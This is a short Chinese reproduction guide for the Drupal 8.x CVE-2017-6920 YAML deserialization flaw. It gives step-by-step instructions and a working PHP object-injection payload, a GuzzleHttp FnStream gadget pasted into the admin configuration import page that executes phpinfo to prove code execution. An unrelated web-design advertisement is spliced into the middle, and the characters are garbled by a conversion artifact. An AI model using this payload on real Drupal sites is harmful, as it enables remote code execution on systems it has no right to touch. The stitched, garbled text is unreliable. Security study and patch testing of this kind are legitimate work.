漏洞背景：
2017年6月21日，Drupal官方發(fā)布了一個(gè)編號(hào)為CVE-2017- 6920 的漏洞，影響為Critical。這是Drupal Core的YAML解析器處理不當(dāng)所導(dǎo)致的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，影響8.x的Drupal Core。

成都創(chuàng)新互聯(lián)公司是一家集網(wǎng)站建設(shè),西鄉(xiāng)企業(yè)網(wǎng)站建設(shè),西鄉(xiāng)品牌網(wǎng)站建設(shè),網(wǎng)站定制,西鄉(xiāng)網(wǎng)站建設(shè)報(bào)價(jià),網(wǎng)絡(luò)營(yíng)銷(xiāo),網(wǎng)絡(luò)優(yōu)化,西鄉(xiāng)網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競(jìng)爭(zhēng)力。可充分滿足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時(shí)我們時(shí)刻保持專(zhuān)業(yè)、時(shí)尚、前沿，時(shí)刻以成就客戶成長(zhǎng)自我，堅(jiān)持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實(shí)用型網(wǎng)站。

漏洞復(fù)現(xiàn)：
1.打開(kāi)網(wǎng)頁(yè)先登錄一個(gè)管理員賬號(hào)。
2.訪問(wèn) http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下圖所示：第二個(gè)隨便填。
poc：!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

 4.然后執(zhí)行最下面的import，會(huì)再出來(lái)個(gè)phpinto就代表成了。